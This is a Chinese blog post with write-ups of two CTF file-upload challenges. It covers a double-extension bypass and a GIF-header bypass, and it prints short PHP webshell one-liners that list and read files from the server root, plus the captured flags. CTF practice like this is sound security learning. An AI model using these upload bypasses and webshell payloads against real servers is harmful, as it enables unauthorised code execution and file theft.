文件上传练习2
|
文章
|
10

163 字
|
2 分钟
本文最后更新于11 天前,其中的信息可能已经过时,如有错误请发送邮件到 matter_lmoon5731@outlook.com

文件上传练习

[UUCTF 2022 新生赛]ez_upload

测试发现没有对双后缀过滤,如何将文件改为php.php.php

image-20260615175236180

然后利用蚂剑连接成功,发现flag在根目录

image-20260615175341633
NSSCTF{This_is_start_web_D0g}

[FSCTF 2023]是兄弟,就来传你の🐎!

这个题目过滤掉了php,以及需要检查文件里面的内容,起初尝试 ,然后发现回显显示太长了。

最后网上搜索发现需要利用gif来进行文件校验,然后利用最短的执行命令行

<?=`ls /`;
<?=`nl /*`;
<?=`cat /*;`
image-20260615211014547

然后访问对应的目录得到flag

image-20260615211132381
NSSCTF{a887e009-0d03-4c83-9a95-045799c44ddb}
文末附加内容
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																

							
							
						

																

							
							
						

										
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇 

                    

                    
			        推荐文章
		            

		            

							
广播攻击

							
							

							
awdp基础

							
							

							
AES-CBC基础练习

							
							

							
文件上传传靶场学习

							
							

							
扩展欧几里得

							
							

							
文件上传练习

							
							

							
文件上传练习3

							
							

							
文件上传练习4

							
							

							
文件包含练习

							
							

							
RSA(二)